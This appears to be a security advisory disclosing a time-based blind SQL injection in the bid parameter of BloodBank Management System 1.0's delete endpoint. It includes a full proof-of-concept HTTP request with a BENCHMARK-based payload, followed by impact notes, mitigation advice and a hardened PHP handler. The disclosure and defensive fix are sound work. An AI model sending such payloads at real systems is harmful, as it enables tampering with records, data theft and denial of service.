@higordiego
Created October 25, 2024 19:58

Affected Version:

  • BloodBank Management System: 1.0

Vulnerability Information:

  • Vulnerability Type: SQL Injection (Time-Based Blind)
  • Severity: HIGH
  • Status: Unpatched

Vulnerable Endpoint:

  • /file/delete.php?bid=6

Vulnerability Description:

A time-based SQL Injection vulnerability was discovered in the record-deletion functionality of the BloodBank Management System version 1.0. It occurs because the bid parameter of /file/delete.php is used in the backend database query without validation or parameterization, allowing an attacker to inject SQL into that query.

This attack relies on a blind SQL injection technique: the attacker uses a time-based delay (via MySQL's BENCHMARK function) to infer whether the injected SQL was executed. If the system delays its response, the attacker knows the injected query ran, allowing them to:

  • Tamper with or delete sensitive records (e.g., blood bank data).
  • Extract data slowly by chaining multiple queries.
  • Cause Denial of Service (DoS) by overloading the system with intensive queries.

Proof of Concept (PoC):

Below is a GET request demonstrating the vulnerability using a time-based SQL injection payload:

GET /file/delete.php?bid=3'%20AND%204994%3dBENCHMARK(5000000%2cMD5(0x51494778))--%20ntES HTTP/1.1
Host: localhost:8080
sec-ch-ua: "Chromium";v="129", "Not=A?Brand";v="8"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Accept-Language: pt-BR,pt;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost:8080/bloodinfo.php
Accept-Encoding: gzip, deflate, br
Cookie: PHPSESSID=48068ce7875c00d88ca3aa2b9269b91f
Connection: keep-alive


Explanation:

This payload injects the SQL command:

' AND 4994=BENCHMARK(5000000, MD5(0x51494778))-- ntES

This causes the backend to compute MD5 5,000,000 times, significantly delaying the response if the injected query is executed. The delay confirms that the system is vulnerable to SQL injection.


Impact:

  • Data Integrity Compromise: Attackers can delete or modify blood bank records.
  • Denial of Service (DoS): Repeated injections can exhaust system resources, making the application unresponsive.
  • Unauthorized Access: Attackers can leverage this vulnerability to further explore the database and escalate privileges.

Mitigation Recommendations:

  1. Use Prepared Statements: Employ parameterized queries to prevent SQL injection.
  2. Input Validation: Validate and sanitize the bid parameter to allow only expected values (e.g., numeric IDs).
  3. Database Permissions: Restrict database user privileges to limit the potential damage of SQL injections.
  4. Monitoring & Logging: Track and alert on unusual patterns, such as slow queries or repeated access attempts against the same endpoint.
  5. Security Testing: Perform regular penetration testing and code reviews to identify and mitigate vulnerabilities.
  6. Error Handling: Avoid exposing database-related errors in responses, which may assist attackers.
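
As an added illustration of recommendations 1, 2 and 6 (example code written for this advisory, not the BloodBank Management System's own source; the PDO connection details and the blood_records table and bid column are assumed placeholders):

```php
<?php
// Added example, not the BloodBank Management System's own code: a hardened
// handler for a delete endpoint that receives ?bid=<id>. Assumptions: MySQL
// via PDO; the table and column names (blood_records, bid) are placeholders.
declare(strict_types=1);

// The pattern this advisory describes (illustrative, not the project's source):
//   $conn->query("DELETE FROM blood_records WHERE bid='" . $_GET['bid'] . "'");
// The raw parameter becomes SQL text, so an appended BENCHMARK(...) is executed.

// Returns the number of rows deleted, or -1 when the input was rejected.
function deleteBloodRecord(PDO $pdo, array $query): int
{
    // Recommendation 2: bid must be a positive integer. FILTER_VALIDATE_INT
    // rejects "3' AND ...", empty strings and anything else that is not an int.
    $bid = filter_var($query['bid'] ?? '', FILTER_VALIDATE_INT,
        ['options' => ['min_range' => 1]]);
    if ($bid === false) {
        return -1;
    }

    // Recommendation 1: the value travels as a bound integer parameter, never
    // as SQL text, so it cannot change the statement's structure.
    $stmt = $pdo->prepare('DELETE FROM blood_records WHERE bid = :bid');
    $stmt->bindValue(':bid', $bid, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->rowCount();
}

try {
    $pdo = new PDO('mysql:host=localhost;dbname=bloodbank', 'app', getenv('DB_PASS') ?: '', [
        PDO::ATTR_EMULATE_PREPARES => false,          // real server-side prepares
        PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
    ]);
    $deleted = deleteBloodRecord($pdo, $_GET);
    if ($deleted < 0) {
        http_response_code(400);
        echo 'Invalid request.';
    } else {
        header('Location: /bloodinfo.php');
    }
} catch (PDOException $e) {
    // Recommendation 6: keep the database error server-side; answer generically.
    error_log('delete.php failed: ' . $e->getMessage());
    http_response_code(500);
    echo 'An internal error occurred.';
}
```

With this handler the PoC request above is rejected with HTTP 400 before any query is built, and a well-formed numeric bid reaches the database only as a bound parameter.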